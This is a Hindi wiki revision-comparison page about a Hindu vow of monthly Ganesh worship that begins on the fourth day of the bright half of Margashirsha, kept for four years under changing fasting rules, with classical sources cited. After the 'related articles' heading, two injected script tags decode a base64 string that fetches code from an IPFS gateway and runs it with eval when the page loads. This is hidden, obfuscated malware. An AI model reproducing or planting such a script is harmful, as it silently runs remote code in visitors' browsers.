व्यवस्थापन (चर्चा | योगदान) छो (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==") |
व्यवस्थापन (चर्चा | योगदान) छो (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==") |
||
(4 सदस्यों द्वारा किये गये बीच के 4 अवतरण नहीं दर्शाए गए) | |||
पंक्ति 1: | पंक्ति 1: | ||
− | *[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में | + | *[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है। |
*यह व्रत [[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[चतुर्थी]] से आरम्भ करना चाहिए। | *यह व्रत [[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[चतुर्थी]] से आरम्भ करना चाहिए। | ||
− | *इसमें प्रतिमास [[गणेश]] पूजन करना चाहिए। तथा उस दिन एकभक्त रहना चाहिए किन्तु क्षार एवं लवण का प्रयोग नहीं करना चाहिए। | + | *इसमें प्रतिमास [[गणेश]] पूजन करना चाहिए। तथा उस दिन एकभक्त रहना चाहिए किन्तु [[क्षार]] एवं लवण का प्रयोग नहीं करना चाहिए। |
− | *यह चार वर्षों तक करना चाहिए, किन्तु दूसरे वर्ष में नक्त, तीसरे में अयाचित एवं चौथे में उपवास करना चाहिए। <ref>हेमाद्रि (व्रतखण्ड 1, 530-31), स्कन्दपुराण से उद्धरण; कृत्यरत्नाकर (504); कालविवेक (190); वर्षक्रियाकौमुदी (498)।</ref> | + | *यह चार वर्षों तक करना चाहिए, किन्तु दूसरे वर्ष में नक्त, तीसरे में अयाचित एवं चौथे में उपवास करना चाहिए।<ref>हेमाद्रि (व्रतखण्ड 1, 530-31), स्कन्दपुराण से उद्धरण; कृत्यरत्नाकर (504); कालविवेक (190); वर्षक्रियाकौमुदी (498)।</ref> |
− | {{ | + | {{संदर्भ ग्रंथ}} |
− | |||
− | |||
− | |||
− | |||
− | |||
− | }} | ||
==टीका टिप्पणी और संदर्भ== | ==टीका टिप्पणी और संदर्भ== | ||
<references/> | <references/> |
10:38, 21 मार्च 2011 के समय का अवतरण
- भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित हिन्दू धर्म का एक व्रत संस्कार है।
- यह व्रत मार्गशीर्ष शुक्ल पक्ष की चतुर्थी से आरम्भ करना चाहिए।
- इसमें प्रतिमास गणेश पूजन करना चाहिए। तथा उस दिन एकभक्त रहना चाहिए किन्तु क्षार एवं लवण का प्रयोग नहीं करना चाहिए।
- यह चार वर्षों तक करना चाहिए, किन्तु दूसरे वर्ष में नक्त, तीसरे में अयाचित एवं चौथे में उपवास करना चाहिए।[1]
टीका टिप्पणी और संदर्भ
- ↑ हेमाद्रि (व्रतखण्ड 1, 530-31), स्कन्दपुराण से उद्धरण; कृत्यरत्नाकर (504); कालविवेक (190); वर्षक्रियाकौमुदी (498)।
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>